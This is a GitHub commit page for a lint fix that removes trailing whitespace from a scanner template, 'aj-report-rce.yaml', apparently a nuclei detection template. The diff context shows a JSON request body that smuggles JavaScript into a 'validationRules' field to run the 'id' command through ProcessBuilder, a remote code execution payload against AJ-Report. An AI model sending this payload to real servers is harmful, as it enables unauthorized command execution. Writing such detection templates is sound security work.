Skip to content

Commit

Permalink
lint -fix
Browse files Browse the repository at this point in the history
  • Loading branch information
pussycat0x committed May 23, 2024
1 parent 623c041 commit c2184ad
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion http/vulnerabilities/other/aj-report-rce.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,6 @@ http:
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

Check failure on line 23 in http/vulnerabilities/other/aj-report-rce.yaml

View workflow job for this annotation

GitHub Actions / build

23:348 [trailing-spaces] trailing spaces
matchers-condition: and
matchers:
- type: word
Expand Down

0 comments on commit c2184ad

Please sign in to comment.